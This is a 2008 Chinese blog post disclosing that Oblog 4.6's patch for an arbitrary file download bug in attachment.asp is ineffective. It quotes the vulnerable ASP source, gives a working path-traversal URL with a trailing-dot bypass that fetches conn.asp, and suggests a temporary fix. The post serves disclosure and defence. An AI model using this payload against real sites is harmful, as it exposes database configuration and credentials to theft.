[五一礼物] 真的补了吗 Oblog漏洞重现

作者:Tr4c3
本来这个礼物只是给BK瞬间群的朋友们共享了,特意说不让拿去搞官方,不幸的是还是有人首先拿官方测试,让人很郁闷,T了该人,拉黑。今天放出来给大家。
########################################################################
Tr4c3[at]126[dot]com 写于[2008-4-29]
版权所有:
http://www.nspcn.org/
http://www.tr4c3.com/
Bk瞬间 [QQ群] & Hi [QQ群]

########################################################################
程序下载:http://down.oblog.cn/oblog4/oblog46_Final_20080403.rar
########################################################################
描述:

愚人节那天雕牌在blog上公布了一个Oblog任意文件下载漏洞。文章见http://www.tr4c3.com/post/302.html <0day>愚人节的礼物 oblog文件下载漏洞。
随后官方发布的Oblog版本里对代码做了些许改动,并发布了相关补丁。详见:http://bbs.oblog.cn/dispbbs.asp?boardid=119&Id=132375 [oblog46体验版_patch_20080403补丁]
http://www.target.com/attachment.asp?path=./conn.asp这样已经无法下载文件,我从官方下载了最新版本4.60 Final Build080403 Access(集成了attachment.asp补丁),发现修改后的代码并不能解决问题,OBlog任意文件下载漏洞依然存在。具体看 attachment.asp代码。
########################################################################
关键部分:
Path = Trim(Request(“path”)) ‘获取用户提交的路径
FileID = Trim(Request(“FileID”))
If FileID =”” And Path = “” Then
Response.Write “参数不足”
Response.End
End If

If CheckDownLoad  Or 1= 1Then
If Path = “” Then
set rs = Server.CreateObject(“ADODB.RecordSet”)
link_database
SQL = (“select file_path,userid,file_ext,ViewNum FROM oblog_upfile WHERE FileID = “&CLng(FileID))
rs.open sql,conn,1,3
If Not rs.Eof Then
uid = rs(1)
file_ext = rs(2)
rs(“ViewNum”) = rs(“ViewNum”) + 1
rs.Update
downloadFile Server.MapPath(rs(0)),0
Else
Response.Status=404
Response.Write “该附件不存在!”
End If
rs.Close
Set rs = Nothing
Else
If InStr(path,Oblog.CacheConfig(56)) > 0 Then ‘Tr4c3 标注:注意这里,仅仅判断用户提交的路径是否包含UploadFiles,为真则调用downloadfile函数下载文件
downloadFile Server.MapPath(Path),1
End if
End If
Else
‘如果附件为图片的话,当权限检验无法通过则调用一默认图片,防止<img>标记无法调用,影响显示效果
If Path = “” Then
Response.Status=403
Response.Write ShowDownErr
Response.End
Else
downloadFile Server.MapPath(blogdir&”images/oblog_powered.gif”),1
End if
End if

Set oblog = Nothing

Sub downloadFile(strFile,stype)
On Error Resume Next
Server.ScriptTimeOut=9999999
Dim S,fso,f,intFilelength,strFilename
strFilename = strFile
Response.Clear
Set s = Server.CreateObject(oblog.CacheCompont(2))
s.Open
s.Type = 1
Set fso = Server.CreateObject(oblog.CacheCompont(1))
If Not fso.FileExists(strFilename) Then
If stype = 0 Then
Response.Status=404
Response.Write “该附件已经被删除!”
Exit Sub
Else
strFilename = Server.MapPath(blogdir&”images/nopic.gif”)
End if
End If
Set f = fso.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
If Err Then
Response.Write(“<h1>错误: </h1>” & Err.Description & “<p>”)
Response.End
End If
Set fso=Nothing
Dim Data
Data=s.Read
s.Close
Set s=Nothing
Dim ContentType
select Case LCase(Right(strFile, 4))
Case “.asp”,”.mdb”,”.config”,”.js” ‘Tr4c3 标注:再看这里,想起来什么来了?对了,前几天我发的沸腾展望新闻系统的任意下载漏洞跟这个检查的方法差不多[http://www.tr4c3.com /post/306.html],利用方法也相似,神奇的”.”又派上用场了。
Exit Sub
Case “.asf”
ContentType = “video/x-ms-asf”
Case “.avi”
ContentType = “video/avi”
Case “.doc”
ContentType = “application/msword”
Case “.zip”
ContentType = “application/zip”
Case “.xls”
ContentType = “application/vnd.ms-excel”
Case “.gif”
ContentType = “image/gif”
Case “.jpg”, “jpeg”
ContentType = “image/jpeg”
Case “.wav”
ContentType = “audio/wav”
Case “.mp3”
ContentType = “audio/mpeg3”
Case “.mpg”, “mpeg”
ContentType = “video/mpeg”
Case “.rtf”
ContentType = “application/rtf”
Case “.htm”, “html”
ContentType = “text/html”
Case “.txt”
ContentType = “text/plain”
Case Else
ContentType = “application/octet-stream”
End select
If Response.IsClientConnected Then
If Not (InStr(LCase(f.name),”.gif”)>0 Or InStr(LCase(f.name),”.jpg”)>0 Or InStr(LCase(f.name),”.jpeg”)>0 Or InStr(LCase(f.name),”.bmp”)>0 Or InStr(LCase(f.name),”.png”)>0 )Then
Response.AddHeader “Content-Disposition”, “attachment; filename=” & f.name
End If
Response.AddHeader “Content-Length”, intFilelength
Response.CharSet = “UTF-8”
Response.ContentType = ContentType
Response.BinaryWrite Data
Response.Flush
Response.Clear()
End If
End Sub

########################################################################
利用方法:
http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.
########################################################################
修补建议:
等待官方发布新的补丁程序。
########################################################################
临时解决办法:
将attachment.asp第5行 Path = Trim(Request(“path”)) 改成 Path = Replace(Trim(Request(“path”)),”..”,””)
########################################################################

相关日志

楼被抢了 3 层了... 抢座Rss 2.0或者 Trackback

发表评论